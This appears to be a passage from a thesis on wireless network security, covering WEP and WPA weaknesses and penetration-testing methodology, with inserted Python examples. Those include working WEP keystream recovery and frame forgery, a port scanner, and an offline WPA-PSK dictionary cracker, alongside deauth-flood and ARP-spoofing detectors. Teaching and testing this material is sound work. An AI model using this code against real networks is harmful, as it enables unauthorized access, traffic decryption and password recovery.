Shared Key authentication works only if WEP encryption is enabled. If it is not, the system defaults to Open System mode, permitting almost any station within range of an AP to join the network. A further problem with this method of authentication is the distribution of the key. Most WLANs share one key among all devices and access points in the network, and it is improbable that a key shared among many users will remain secret indefinitely. A partial solution is for administrators to configure the secret key on the wireless stations themselves, rather than letting end users perform this task; the shared key is still stored on the users' computers, however, where it is vulnerable [Walker 2000].

In addition, if the key on even one station is compromised, all the other stations in the system must be reconfigured with a new key. A better solution is to assign a unique key to each station and to change the keys frequently. Furthermore, in many WLAN systems the key used for authentication is the same key used for encryption, creating a dual threat. The solution is to distribute separate keys throughout the system, one for authentication and another for encryption [Walker 2000].
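The three WEP weaknesses discussed in this section (key stream reuse under a repeated IV, forgery through the linear CRC-32 ICV, and the key stream leaked by Shared Key authentication) can be reproduced with a few dozen lines of Python. The block below is an added example, not code from the thesis or from any of the tools it cites: it implements WEP's RC4 and ICV construction as the standard describes them, then shows what a listener who never learns the key can do. The key, IV and frame contents in `demo()` are constructed for the example.

```python
import struct
import zlib


def rc4(key, length):
    """Plain RC4 (KSA + PRGA) key stream of `length` bytes; WEP uses it as is."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext):
    """WEP integrity check value: plain CRC-32, little-endian, no key involved."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(secret_key, iv, plaintext, key_id=0):
    """Frame body = IV (3) || key id (1) || RC4(IV||key) XOR (plaintext || ICV)."""
    keystream = rc4(iv + secret_key, len(plaintext) + 4)
    return iv + bytes([key_id]) + xor(plaintext + icv(plaintext), keystream)


def wep_decrypt(secret_key, body):
    """Receiver side: decrypt and check the ICV; None if the check fails."""
    iv, cipher = body[:3], body[4:]
    data = xor(cipher, rc4(iv + secret_key, len(cipher)))
    plaintext, received_icv = data[:-4], data[-4:]
    return plaintext if icv(plaintext) == received_icv else None


# ---- what an eavesdropper can do without the key ------------------------

def recover_keystream(body, known_plaintext):
    """A frame with known plaintext (an ARP request, or the 128-byte Shared
    Key challenge and its encrypted reply) gives the key stream for its IV."""
    return body[:3], xor(body[4:], known_plaintext + icv(known_plaintext))


def decrypt_with_keystream(body, keystream):
    """Any other frame sent under the same IV is now readable."""
    cipher = body[4:]
    if len(cipher) > len(keystream):
        raise ValueError("recovered key stream shorter than this frame")
    return xor(cipher, keystream)[:-4]


def forge_frame(iv, keystream, new_plaintext, key_id=0):
    """Build a frame the AP accepts: CRC-32 needs no key, so the attacker
    computes a valid ICV for any plaintext and encrypts with the key stream."""
    data = new_plaintext + icv(new_plaintext)
    if len(data) > len(keystream):
        raise ValueError("recovered key stream shorter than the forged frame")
    return iv + bytes([key_id]) + xor(data, keystream)


def demo():
    """Constructed scenario: the AP reuses one IV for two frames."""
    key = bytes.fromhex("0123456789abcdef0123456789")   # 104-bit WEP key
    iv = b"\x11\x22\x33"
    known = b"ARP request: who-has 10.0.0.1?  "          # 32 bytes, guessable
    secret = b"GET /payroll HTTP/1.1 Host: hr "          # victim's traffic
    frame_known = wep_encrypt(key, iv, known)
    frame_secret = wep_encrypt(key, iv, secret)
    iv_seen, keystream = recover_keystream(frame_known, known)
    recovered = decrypt_with_keystream(frame_secret, keystream)
    forged = forge_frame(iv_seen, keystream, b"ICMP echo to 10.0.0.99 from atk")
    return recovered, wep_decrypt(key, forged)   # second value: AP accepts it
```

`demo()` returns the victim's plaintext and the forged frame as the AP decrypts it (a valid ICV, so it is accepted), all without `key` ever being used by the attacker. The Shared Key authentication leak is the same `recover_keystream` call with the clear challenge as `known_plaintext` and the station's reply as `body`.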

1.2.3 Wi-Fi Protected Access

Because Wired Equivalent Privacy (WEP) was found to be badly flawed, to the serious detriment of its security claims and supporters, the Wi-Fi Alliance, the industry group that promotes interoperability and security for the wireless LAN industry, created the Wi-Fi Protected Access (WPA) standard as an interim replacement for WEP. WPA implemented the TKIP (Temporal Key Integrity Protocol) portion of the draft IEEE 802.11i standard on existing hardware; the ratified 802.11i standard, certified as WPA2, adds the stronger AES-based CCMP cipher [Cam-Winget 2003].


WPA allows for two kinds of authentication: WPA-802.1X (also called WPA-Enterprise) and WPA-PSK (also called WPA-Personal or WPA-Home). The first uses IEEE 802.1X with the Extensible Authentication Protocol (EAP) and a Remote Authentication Dial-In User Service (RADIUS) server on the network. A RADIUS server “is a certificate authenticator that only allows client stations to connect with the Access Point (AP) if it sees a valid certificate on the client, which the server provided earlier” [Housley 2003]. That description fits the certificate-based EAP-TLS method; other EAP methods such as PEAP and EAP-TTLS present a certificate only on the server side and authenticate the client with a username and password inside a TLS tunnel. Each successful EAP exchange yields a fresh Pairwise Master Key (PMK) for that session. This use of WPA is generally for medium to large businesses and is rarely seen in small office/home office (SOHO) environments [Housley 2003].

For SOHO environments WPA-PSK is the practical choice. It uses a pass-phrase of between 8 and 63 characters, created by the user and entered into every client station's configuration utility as well as into the AP. No EAP exchange takes place; instead both sides derive the 256-bit PMK from the pass-phrase and the SSID using PBKDF2 with 4,096 iterations of HMAC-SHA1. The four-way EAPOL-Key handshake that follows in both modes addresses the two remaining needs: the access point and the client each prove possession of the PMK, so the AP authenticates itself to the client as well, and the per-session keys used to encrypt the traffic are derived from the PMK and the nonces exchanged [Housley 2003].

1.3 Wireless Penetration Testing

As mentioned before, a penetration test offers an invaluable and compelling way to establish a baseline assessment of security as seen from outside the boundaries of the organization's network. If executed properly, penetration tests provide evidence that vulnerabilities exist and that network penetrations are possible. More importantly, they provide a blueprint for remediation with which to start or enhance a comprehensive information protection strategy [INSIGHT 2008].


Penetration tests require certain key elements to be in place in order to ensure useful, timely results. First, they must cover the full range of the threat spectrum, from the presence of an antivirus engine to the more sophisticated vulnerabilities that might enable denial of service attacks. Second, they must deliver clear, unambiguous results that address both the technical and the business objectives of the client. There are methodologies that the consultants need to follow, and the most up-to-date software should be used, with the goal of gaining maximum results with minimal disruption to normal business operations [Beaver 2005].

The first step in deploying a penetration test is planning. There has to be a well defined and ordered plan before testing of the wireless network for security vulnerabilities begins. It is critical to plan everything in advance. This includes [Beaver 2005]:

• Permission to perform the tests from the boss, project sponsor, or client.

• Testing goals.

• Tests to run.

Ethical hacking is more than just running a wireless network analyzer and scanning for open ports. There are formal procedures that should be incorporated into the testing plan [Beaver 2005]. A well thought out professional attack against a wireless network is likely to flow in the following sequence [Vladimirov 2004]:

1. Enumerating the network and its coverage area via the information available online and from personal contacts and social engineering.

2. Planning the site survey methodology and the attacks necessary to deploy against the network.

3. Assembling, configuring, setting up and checking all the hardware devices and software tools needed to carry out the attacks.

4. Surveying the network site and determining the network boundaries and signal strength along the network perimeter. Establish the best sites for stationary attacks by finding a spot where the signal strength and the signal-to-noise ratio (SNR) are high, and the physical exposure factors, such as site visibility and reachability by security guards and CCTV, are low.

5. Analyzing the available network traffic. Determine whether the traffic is encrypted or not, and how high the network load is.

6. Trying to break the discovered safeguards. This might involve bypassing MAC and protocol filtering, determining closed (hidden) ESSIDs, cracking WEP, and defeating higher layer defensive countermeasures.

7. Scanning and discovering all detectable hosts on both the wired and wireless networks.

8. Passively enumerating these hosts and analyzing the security of the protocols present on the wireless and connected wired LANs.

9. Actively enumerating interesting hosts and launching attacks against them aimed at gaining top level accounts and privileges.

1.3.1 Determining What Others Know

The first formal step in the ethical-hacking methodology is to perform a high-level network reconnaissance called footprinting. By looking at the targeted network from an outsider's perspective, the goal is to find out what is available to just about anyone. The important information to search for is [Beaver 2005]:

• Radio signal strength

• Specific SSIDs that are being broadcast

• IP addressing schemes

• Encryption method used, such as WEP or WPA

• Hardware makes and models

• Software versions

1.3.2 Mapping the Network

After finding out what the general public can find out about the network, the next

step is to create a network map to show how the network is laid out. It is important to

map the network from both inside and outside. This allows the ethical hacker not only to

see internal and external configuration information but also to see configuration

information specific to wireless radio waves that are transmitted both inside and outside

the network [Puneet 2008].

1.3.3 Scanning the System

The next step is to perform port scanning and enumeration against the hosts reachable from the wireless network in order to gather more in-depth information about them. Enumeration involves listing and identifying the specific services and resources that a target offers. This detailed information gives an attacker what is needed to try a large number of potential vulnerabilities. By connecting to the open ports on a system, the penetration tester can obtain information such as [Puneet 2008]:

• Acceptable usage policies and login warnings on banner pages.

• Software and firmware versions.

• Operating-system versions.

• Configuration of operating systems and applications.

Table 1.1 outlines the ports that are most often found open and attacked.

Table 1.1 Commonly Hacked Wireless Network Ports [Beaver 2005]:

Port          Service                                            Protocol
20            FTP data                                           TCP
21            FTP control                                        TCP
22            SSH                                                TCP
23            Telnet                                             TCP
25            SMTP (Simple Mail Transfer Protocol)               TCP
53            DNS (Domain Name System)                           TCP, UDP
80            HTTP (Hypertext Transfer Protocol)                 TCP
110           POP3 (Post Office Protocol version 3)              TCP
135           RPC/DCE endpoint mapper for Microsoft networks     TCP, UDP
137, 138, 139 NetBIOS over TCP/IP                                TCP, UDP
161           SNMP (Simple Network Management Protocol)          UDP
443           HTTPS (HTTP over SSL/TLS)                          TCP
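The enumeration step described above, as an added example that is not part of the thesis: a small TCP connect scan with banner grabbing over the TCP ports of Table 1.1. It is written in Python rather than produced by any scanner the thesis names, and the hostnames and port lists it is run against are whatever the tester supplies; 53 and 161 are included only as TCP ports, since a connect scan cannot observe UDP services.

```python
import socket
from concurrent.futures import ThreadPoolExecutor

# TCP ports from Table 1.1. 53 and 161 also run over UDP, which a TCP
# connect scan cannot see; a UDP probe needs a different technique.
COMMON_TCP_PORTS = [20, 21, 22, 23, 25, 53, 80, 110, 135, 139, 443]


def probe_port(host, port, timeout=1.0):
    """Full TCP connect to host:port; return (port, state, banner)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                banner = s.recv(256)          # SSH, FTP, SMTP, POP3 talk first
            except socket.timeout:
                banner = b""
            if not banner:
                try:                          # HTTP waits for the client: poke it
                    s.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
                    banner = s.recv(256)
                except OSError:
                    banner = b""
            return port, "open", banner.decode("latin-1", "replace").strip()
    except ConnectionRefusedError:
        return port, "closed", ""             # RST came back: nothing listening
    except socket.timeout:
        return port, "filtered", ""           # no answer: firewall or drop
    except OSError as exc:
        return port, f"error: {exc}", ""


def scan(host, ports=COMMON_TCP_PORTS, timeout=1.0, workers=16):
    """Scan the given ports concurrently; return {port: (state, banner)}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = pool.map(lambda p: probe_port(host, p, timeout), list(ports))
    return {port: (state, banner) for port, state, banner in results}


def report(host, ports=COMMON_TCP_PORTS, timeout=1.0):
    """Lines of text for the pentest notes, open ports first."""
    found = scan(host, ports, timeout)
    lines = []
    for port in sorted(found, key=lambda p: (found[p][0] != "open", p)):
        state, banner = found[port]
        lines.append(f"{host}:{port:<5} {state:<10} {banner[:60]}")
    return lines
```

The banner string is exactly the kind of evidence the list above asks for (software and firmware versions, login warnings); a `filtered` result, as opposed to `closed`, tells the tester that something between the wireless segment and the host is dropping packets. Only scan hosts that are within the agreed scope.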


1.3.4 Performing a Vulnerability Assessment

After finding potential “holes” or “windows” into the wireless network, the next step is to see whether more serious vulnerabilities exist. This can be done manually or with automated tools such as Nessus, GFI LANguard or the Microsoft Baseline Security Analyzer for Windows hosts. These tools take much of the legwork out of vulnerability assessment, giving the penetration tester more time to plan the last step [Hassell 2004].

1.3.5 Penetrating the System

The last step of the ethical-hacking methodology is the system-penetration phase. This is the true test of which systems and information can actually be compromised on the wireless network. With all the information gathered about the wireless network, the systems running on it and their vulnerabilities, the ethical hacker tries to access the resources on the wireless network without having the right permissions, just as a malicious hacker would. All the attacks and tools described before are used in this phase [Hassell 2004].

WarDriving and Site Surveying

Wardriving is the activity of driving through a city or populated area while sampling the airwaves for wireless access points. This activity is not illegal as long as the person does not abuse the discovered networks' resources and does not eavesdrop on data traffic. Site surveying is very different from casual wardriving: it is the initial stage of penetration testing and security auditing, in which the surveyor concentrates on a specified network and studies it in great detail. The site survey serves four major security-related aims [Hurley 2007]:

• Finding out where attackers can physically position themselves.

• Detecting rogue access points and neighbouring networks.

• Baselining the interference sources, so that abnormal levels of interference, such as that intentionally created by a jamming device, can be detected in the future.

• Distinguishing network design and configuration problems from security-related issues.

There are several wireless network mapping and signal monitoring tools available

in the market and most of them are free [Hassell 2004].

The most common tool for active scanning is NetStumbler, closed-source software that performs active scanning by sending probe request frames and waiting for probe responses. The probe response frames are dissected to show the network ESSID, channel, the presence of WEP, signal strength and the supported bit rates [Hurley 2007]. Because it transmits probe requests, NetStumbler is itself detectable by a wireless IDS.

When NetStumbler locates a network, it records the following information [Siles 2007]:

• The signal, noise and signal-to-noise ratio (SNR) of the discovery.

• The operating channel.

• The BSSID, which is the MAC address of the access point.

• The Service Set Identifier (SSID), which is the human-readable name of the network.

• The access point's name.

Another useful wireless network discovery tool is AiroPeek which is commercial

wireless network traffic and protocol analyzer from Wildpackets, Inc. AiroPeek offers

multiple features for monitoring and trouble shooting wireless LANs, including [Hurley

2007]:

• Full decodes of packets for 802.11a, 802.11b, and 802.11g.

• A security audit template with pre-defined filters.

• Scan by channel, ESSID or BSSID.

• Displays of data rate, channel and signal strength for each packet.

One of the most common open source tools for wardriving is Kismet. As mentioned before, Kismet is a universal 802.11 sniffer that has grown from a wardriving tool into a full-blown protocol analyzer and intrusion detection system (IDS) suite. Because it listens passively, it transmits nothing itself. Kismet can detect other scanning programs such as NetStumbler, detect Cisco products through CDP, detect the IP block (address range) in use on a network, and discover “closed” or “hidden” SSIDs of access points where SSID broadcast is disabled, by watching the probe and association frames of clients that know the name. Furthermore, with a GPS driver Kismet can map access point locations [Hurley 2007].
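What NetStumbler, AiroPeek and Kismet extract from a beacon or probe response (BSSID, SSID or its absence, channel, and whether the network is open, WEP, WPA or WPA2) comes from the frame's fixed fields and tagged information elements. The following Python is an added example, not code from the thesis or from those tools, that performs that decoding. It assumes the 24-byte management frame header precedes the body; the two beacons at the bottom are constructed for the example, with arbitrary BSSID and SSID values.

```python
import struct

MGMT_HEADER_LEN = 24                        # management frames have no Address 4
WPA_IE_PREFIX = bytes.fromhex("0050f201")   # Microsoft OUI 00:50:f2, type 1 = WPA


def parse_ies(area):
    """Split the tagged-parameter area into (tag, value) pairs."""
    ies, i = [], 0
    while i + 2 <= len(area):
        tag, length = area[i], area[i + 1]
        value = area[i + 2:i + 2 + length]
        if len(value) < length:          # truncated capture: stop, do not guess
            break
        ies.append((tag, value))
        i += 2 + length
    return ies


def parse_beacon(frame):
    """Return what a scanner records from one beacon or probe response."""
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0 or (fc0 >> 4) not in (5, 8):
        raise ValueError("not a beacon or probe response")
    body = frame[MGMT_HEADER_LEN:]
    _timestamp, interval, capability = struct.unpack_from("<QHH", body, 0)
    info = {
        "bssid": ":".join(f"{b:02x}" for b in frame[16:22]),
        "beacon_interval_tu": interval,
        "privacy": bool(capability & 0x0010),   # Privacy bit: "WEP" in old tools
        "ssid": None,
        "hidden_ssid": False,
        "channel": None,
        "rates_mbps": [],
        "security": "open",
    }
    rsn = wpa = False
    for tag, value in parse_ies(body[12:]):
        if tag == 0:                            # SSID
            if not value.strip(b"\x00"):        # zero-length or all NULs
                info["hidden_ssid"] = True
            else:
                info["ssid"] = value.decode("utf-8", "replace")
        elif tag == 1:                          # Supported Rates, units of 500 kbps
            info["rates_mbps"] = [(r & 0x7F) / 2 for r in value]
        elif tag == 3 and value:                # DS Parameter Set
            info["channel"] = value[0]
        elif tag == 48:                         # RSN IE -> 802.11i / WPA2
            rsn = True
        elif tag == 221 and value.startswith(WPA_IE_PREFIX):
            wpa = True                          # vendor IE -> WPA (TKIP)
    if rsn and wpa:
        info["security"] = "wpa/wpa2"
    elif rsn:
        info["security"] = "wpa2"
    elif wpa:
        info["security"] = "wpa"
    elif info["privacy"]:
        info["security"] = "wep"
    return info


# Constructed frames for the example; addresses and SSIDs are arbitrary.
_HDR = bytes.fromhex("8000" "0000" "ffffffffffff" "001122334455" "001122334455" "0000")
_FIXED = bytes.fromhex("0000000000000000" "6400" "1104")   # 100 TU, ESS + Privacy
_RATES = bytes.fromhex("0108" "82848b960c121824")           # 1,2,5.5,11,6,9,12,18
_RSN = bytes.fromhex("3014" "0100" "000fac04" "0100" "000fac04" "0100" "000fac02" "0000")
_WPA = bytes.fromhex("dd16" "0050f201" "0100" "0050f202" "0100" "0050f202" "0100" "0050f202")

BEACON_WPA2 = (_HDR + _FIXED + bytes.fromhex("0007") + b"corpnet" + _RATES
               + bytes.fromhex("030106") + _RSN)
BEACON_HIDDEN_WPA = (_HDR + _FIXED + bytes.fromhex("0000") + _RATES
                     + bytes.fromhex("03010b") + _WPA)
```

Note that the Privacy bit alone only says "something is encrypted"; it is the RSN and WPA information elements that separate WEP from WPA and WPA2, which is why older scanners that report only "WEP" are misleading on modern networks. A hidden SSID is reported as such rather than guessed; recovering the name requires watching a client's probe or association request, as Kismet does.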

WEP cracking

As described before, WEP is problematic because it uses only 24 bits for its IV, so eventually the same IV is used for different data frames and the same key stream encrypts all of them. All an attacker needs to do is collect data frames for an extended period with the traffic-analysis tools described earlier and then run a WEP cracking tool. The statistical attacks described next require a large number of WEP-encrypted frames with distinct IVs; the newer PTW attack requires considerably fewer packets [Walker 2000].


FMS (Fluhrer, Mantin and Shamir) attacks exploit a weakness in the way WEP uses the RC4 key scheduling algorithm: certain “weak” IVs leak information about bytes of the secret key. To crack the WEP key the penetration tester must initially collect somewhere between 5 and 10 million packets in order to capture around 3,000 weak IVs. Sometimes the attack succeeds with as few as 1,500 weak IVs, and sometimes it takes more than 5,000 before the crack is successful [Walker 2000].

The KoreK family of attacks extends the FMS idea with additional statistical correlations, reducing the number of packets that must be collected from millions to hundreds of thousands [Walker 2000]. The related chopchop attack (also due to KoreK) does not recover the key at all: it chops the last byte off an encrypted frame and, exploiting the linearity of the CRC-32 ICV, uses the access point as an oracle to learn that byte, repeating the process until the whole frame is decrypted. The recovered plaintext and key stream are then used to inject traffic, typically replayed ARP requests, which forces the network to generate the fresh IVs that the statistical attacks need.

The third and newest attack is the Pychkine/Tews/Weinmann (PTW) attack, which no longer depends on weak IVs: it works with ordinary ARP frames, whose plaintext is largely predictable, so a far smaller number of packets needs to be collected. Using this technique the probability of cracking a 104-bit WEP key is 50 percent with as few as 40,000 packets, and the cracking time drops to mere minutes [Puneet 2008].

The most commonly used WEP cracking tool is AirSnort which has a very

intuitive interface and is straightforward to use. The number of packets required to crack

a WEP key is somewhere between 5 and 10 million packets, but once this amount of

packets has been gathered, it takes less than one second to identify the key [Vladimirov

2004].


Another popular tool is WepAttack, which is open source. WepAttack uses brute-force or dictionary attacks to find the right key from a pcap dump of encrypted data. The advantage of this tool is that it needs only one WEP-encrypted data frame to start an attack. The ability to crack WEP without collecting massive amounts of encrypted data makes dictionary attacks a serious threat to 802.11 networks still using WEP with human-chosen keys [Vladimirov 2004].

Attacks against WPA

Unlike attacks against WEP, attacks against WPA do not require a large number of packets to be collected. Once the handshake has been captured the attack is performed offline, without being in range of the target access point. It is also important to note that this attack applies only when WPA is used with a pre-shared key: in WPA-Enterprise (WPA-RADIUS) the PMK is derived from each EAP session rather than from a static pass-phrase, so there is nothing to guess from a captured handshake. The idea behind the attack is to capture the four-way EAPOL-Key handshake, which carries the nonces and a MIC computed with a key derived from the PMK. Each candidate pass-phrase from an extensive word list is then stretched with PBKDF2 (4,096 iterations of HMAC-SHA1) into a candidate PMK, the MIC is recomputed and compared with the captured one. Because every guess costs 4,096 HMAC operations the attack is slow, and only short or dictionary-based pass-phrases are recoverable in practice; to have a reasonable chance of success the pre-shared key should be shorter than about 21 characters [Vladimirov 2004].
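The following Python is an added example, not code from the thesis or from any WPA cracking tool, that ties together the WPA-PSK key derivation from Section 1.2.3 and the offline dictionary attack described here: PBKDF2 from pass-phrase and SSID to the PMK, the HMAC-SHA1 PRF that expands the PMK and both nonces into the PTK, and the EAPOL-Key MIC check that tells a correct guess from a wrong one. The handshake in `make_sample_handshake` is constructed (arbitrary MAC addresses and nonces, and an empty key-data field) rather than taken from a capture; a real attack reads the same values from message 2 of a captured handshake.

```python
import hashlib
import hmac
import struct


def wpa_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def wpa_kck(pmk, ap_mac, sta_mac, anonce, snonce):
    """Derive the PTK and return its first 16 bytes, the Key Confirmation Key."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 64)[:16]


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """EAPOL-Key MIC for key-descriptor version 2 (CCMP): HMAC-SHA1 cut to
    16 bytes. Version 1 (TKIP) uses HMAC-MD5 instead. The frame is hashed
    with its 16-byte MIC field set to zero."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(handshake, wordlist):
    """Offline dictionary attack: return the pass-phrase that reproduces the
    captured MIC, or None. Every guess costs 4096 HMAC-SHA1 iterations."""
    for word in wordlist:
        kck = wpa_kck(wpa_pmk(word, handshake["ssid"]), handshake["ap_mac"],
                      handshake["sta_mac"], handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
            return word
    return None


def make_sample_handshake(passphrase="blue lobster 7", ssid="corpnet"):
    """Build a constructed message 2 of the four-way handshake (not a real
    capture) holding the values an attacker would lift from a pcap."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("aabbccddee01")
    anonce, snonce = bytes(range(32)), bytes(range(0x80, 0xA0))
    # EAPOL header (version 2, type Key, length 95) + EAPOL-Key descriptor
    # with key info 0x010a (version 2, pairwise, MIC present), MIC zeroed.
    eapol = (bytes([2, 3]) + struct.pack(">H", 95) + bytes([2])
             + struct.pack(">HH", 0x010A, 16) + (1).to_bytes(8, "big")
             + snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16)
             + struct.pack(">H", 0))
    kck = wpa_kck(wpa_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol,
            "mic": eapol_mic(kck, eapol)}
```

`wpa_pmk("password", "IEEE")` reproduces the PBKDF2 test vector from the 802.11i standard, and `crack_psk(make_sample_handshake(), wordlist)` returns the pass-phrase only if it is in the list. Because the SSID salts the derivation, a PMK table computed for one network name is useless against another, which is why changing a default SSID costs an attacker the benefit of precomputation.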


Denial of Service Attacks

Wireless networks are vulnerable to this type of attack for two main reasons. The first is the lack of authentication of 802.11 management frames such as beacons, association requests, probe responses and deauthentication notices. The MAC-layer functionality of these networks lets wireless systems discover, join and roam freely, and this implicit trust makes it easy for attackers to spoof legitimate devices and knock individual hosts off the network. The second reason is the lack of physical boundaries for radio waves [Bellardo 2003].

The main objective of any denial of service (DoS) attack is to prevent users from accessing network resources. The most common methods of mounting a DoS attack are to flood a network with degenerate or malformed packets, crowding out legitimate traffic and causing systems to stop responding. Although this type of attack can also be performed on wired networks, wireless systems are particularly susceptible to DoS attacks because of the way the different layers of the OSI stack interact with one another [Hassell 2004].

Attacking the physical layer of a wireless network is much easier than attacking the physical layer of a wired network, because the wireless physical layer is the air in the general vicinity of an access point. Attackers do not need to gain access to the corporate premises; they can begin their attack from a car or a nearby restaurant, depending on how the access points are laid out. From a forensic investigator's point of view it is also harder to determine whether a physical-layer DoS attack has occurred, since it leaves no evidence on the wired network [Bellardo 2003].


There are several ways to create a DoS attack. An attacker can build a device that floods the 2.4 GHz spectrum with noise and illegitimate traffic. For instance, wireless security cameras, Bluetooth systems, baby monitors, microwave ovens, and even some poorly designed 2.4 GHz cordless phones can cause interference at 2.4 GHz, the range in which 802.11b wireless networks operate [Hassell 2004].

At the data link layer of the OSI stack, attacks are again simpler to launch against wireless systems than against traditional wired networks. One of the most common ways to mount an attack against the data link layer is through the manipulation of diversity antennas. Another issue at the data link layer is spoofed access points. Since clients are typically configured to associate with the access point that has the strongest signal, an attacker can simply spoof the SSID of an access point and clients will automatically associate with it and pass frames to it [Hassell 2004].

Although there are several ways to create a denial of service (DoS) attack, one common tool is a frame-generation tool such as Void11. This tool was designed for data link layer DoS resilience testing. Void11 can generate three types of frames, namely deauthenticate, authenticate, and associate. Floods of authentication and association requests can crash or freeze some access points by filling up the buffer space assigned for handling and processing these requests [Beaver 2005].
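The management-frame floods described above are also what a defender can watch for: because deauthenticate, authenticate and associate frames carry no authentication, a burst of them naming one BSSID in a short window is the signature of the attack rather than of normal roaming. The following Python is an added example, not code from this report or from Void11; the one-frame-per-line log format and the MAC addresses are constructed for it, and the window and threshold values are assumptions to be tuned per site.

```python
"""Flag floods of 802.11 management frames in a frame log.

Added example (not from the original report). The one-frame-per-line log
format below is constructed; a real feed would come from a monitor-mode
capture. Window and threshold values are assumptions to be tuned per site.
"""
from collections import defaultdict, deque

# Unauthenticated management subtypes whose floods the text describes.
FLOOD_SUBTYPES = {"deauth", "auth", "assoc-req"}

AP = "00:0f:66:aa:bb:cc"      # constructed BSSID of the lab access point
STA = "00:16:6f:11:22:33"     # constructed client MAC

# Constructed benign traffic: a beacon and one normal authenticate/associate exchange.
NORMAL_LOG = (
    f"0.000 beacon src={AP} dst=ff:ff:ff:ff:ff:ff bssid={AP}\n"
    f"0.120 auth src={STA} dst={AP} bssid={AP}\n"
    f"0.125 auth src={AP} dst={STA} bssid={AP}\n"
    f"0.130 assoc-req src={STA} dst={AP} bssid={AP}\n"
)

# Constructed flood: 60 broadcast deauth frames 4 ms apart, spoofing the AP's address.
FLOOD_LOG = "".join(
    f"{5.0 + i * 0.004:.3f} deauth src={AP} dst=ff:ff:ff:ff:ff:ff bssid={AP}\n"
    for i in range(60)
)

SAMPLE_LOG = NORMAL_LOG + FLOOD_LOG


def parse_line(line):
    """'<ts> <subtype> k=v ...' -> (timestamp, subtype, {k: v})."""
    ts, subtype, *pairs = line.split()
    return float(ts), subtype, dict(p.split("=", 1) for p in pairs)


def find_floods(log_text, window_s=1.0, threshold=20):
    """Return one alert per (bssid, subtype) whose frame count within a
    sliding window of window_s seconds reaches threshold."""
    windows = defaultdict(deque)   # (bssid, subtype) -> timestamps inside the window
    alerted = set()
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, subtype, fields = parse_line(line)
        if subtype not in FLOOD_SUBTYPES:
            continue
        key = (fields["bssid"], subtype)
        recent = windows[key]
        recent.append(ts)
        while recent and ts - recent[0] > window_s:
            recent.popleft()
        if len(recent) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({
                "bssid": key[0],
                "subtype": subtype,
                "count": len(recent),
                "first_ts": recent[0],
                "last_ts": ts,
            })
    return alerts


if __name__ == "__main__":
    for alert in find_floods(SAMPLE_LOG):
        print(alert)
```

The normal exchange produces two authenticate frames and never trips the threshold; the constructed flood is reported once, at the frame that pushes the window count to the threshold, so a noisy attack does not generate one alert per frame. Kismet, discussed later in this report, raises comparable alerts from live captures.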


Man-in-the-middle Attacks

Similar to DoS attacks, man-in-the-middle attacks on a wireless network are significantly easier to mount than against wired networks. The reason is that such attacks on a wired network typically require some sort of access to the network. Man-in-the-middle attacks take two common forms: eavesdropping and manipulation. In eavesdropping, an attacker just listens to a set of transmissions to and from different hosts, even though the attacker’s computer is not part of the transaction. Manipulation attacks, on the other hand, change the contents of the unauthorized received data stream to suit a certain purpose [Bayles 2007].

This attack can happen in various ways. One is ARP poisoning, where the attacker manipulates the operating system, router, and switch ARP tables in order to spoof the victim’s MAC address. Another is port stealing, where an attacker spoofs packets by setting the source address to the victim’s address and the destination address to his own address. There are various tools that hackers use to create MITM attacks. The most popular MITM tools are open source tools for the UNIX/Linux and Windows platforms [Bayles 2007].
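ARP poisoning leaves a trace that a sensor on the segment can see: an IP address that is suddenly claimed by a MAC other than the one already known for it, most often the gateway’s IP being claimed by a station’s MAC. The following Python is an added example, not code from this report; the ARP reply log, the addresses and the static binding table are constructed for it.

```python
"""Detect ARP cache poisoning from observed ARP replies.

Added example (not from the original report). The ARP reply log is
constructed; on a live network the same check would run over ARP replies
seen by a sensor on the segment.
"""

# Constructed static bindings a defender would provision for critical hosts.
STATIC_BINDINGS = {"192.168.1.1": "00:0f:66:aa:bb:cc"}   # lab gateway

# Constructed ARP reply log: normal replies, then a station claiming the gateway's IP.
SAMPLE_ARP_LOG = """\
reply 192.168.1.1 is-at 00:0f:66:aa:bb:cc
reply 192.168.1.10 is-at 00:16:6f:11:22:33
reply 192.168.1.20 is-at 00:16:6f:44:55:66
reply 192.168.1.1 is-at 00:16:6f:11:22:33
reply 192.168.1.20 is-at 00:16:6f:11:22:33
reply 192.168.1.1 is-at 00:16:6f:11:22:33
"""


def parse_arp_reply(line):
    """'reply <ip> is-at <mac>' -> (ip, mac), or None for any other line."""
    parts = line.split()
    if len(parts) != 4 or parts[0] != "reply" or parts[2] != "is-at":
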